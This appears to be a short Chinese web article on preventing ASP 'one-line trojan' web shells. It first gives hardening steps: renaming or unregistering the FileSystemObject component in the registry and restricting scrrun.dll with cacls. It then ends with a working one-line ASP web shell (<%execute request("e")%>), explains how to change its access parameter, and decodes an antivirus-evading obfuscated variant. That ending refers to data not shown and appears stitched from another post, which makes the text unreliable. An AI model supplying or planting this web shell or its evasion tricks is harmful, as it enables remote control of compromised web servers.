如何防止ASP一句话木马？

ASP木马注入到网站服务器后，可通过控制整个网站的所有的源代码，其中程序修改或删除网站的其它内容，如果一不小心注入的是网站服务器，那么影响的就不是一个网站，而是整个网站服务器上的所有网站.

防止ASP一句话木马的方法如下：

1、可以通过修改注册表，将此组件改名，来防止此类木马的危害。

HKEY_CLASSES_ROOT\Scripting.FileSystemObject\

改名为其它的名字，如：改为FileSystemObject_ChangeName，以后调用的时候使用这个就可以正常调用此组件了。

2、也要将clsid值也改一下：

HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值

3、也可以将其删除，来防止此类木马的危害。

注销此组件命令：RegSrv32 /u C:\WINNT\SYSTEM\scrrun.dll

4、禁止Guest用户使用scrrun.dll来防止调用此组件。

使用命令：cacls C:\WINNT\system32\scrrun.dll /e /d guests.

最简单的一句话:<%execute request("e")%>

这里的密码就是 e 如果要改就改这里:<%execute request("这里就是所谓的密码")%>

你这个等于是为了防杀,又加了一次密, 这串数据的原文其实是:

execute(request(chr(35))) 这里的chr(35)就是#

如果你要改密码,就是要改 3335 这里了,有没有看到最后有三个 29 就是:292929,这其实就是最后的三个括号

---